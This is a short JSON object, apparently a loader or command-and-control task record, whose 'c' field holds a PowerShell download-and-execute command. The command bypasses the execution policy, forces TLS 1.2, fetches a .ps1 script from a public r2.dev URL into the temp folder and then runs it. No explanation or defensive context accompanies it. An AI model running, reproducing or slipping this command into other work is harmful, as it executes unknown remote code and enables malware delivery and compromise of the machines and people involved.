{"v": "1.0.1", "c": "powershell.exe -ExecutionPolicy Bypass -Command \"$scriptUrl = 'https://pub-3487957b7852418bae870a8d06b2dadf.r2.dev/1697845.ps1'; $tempScriptPath = [System.IO.Path]::Combine($env:TEMP, 'temp.ps1'); [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -UseBasicParsing -Uri $scriptUrl -OutFile $tempScriptPath; . $tempScriptPath\""}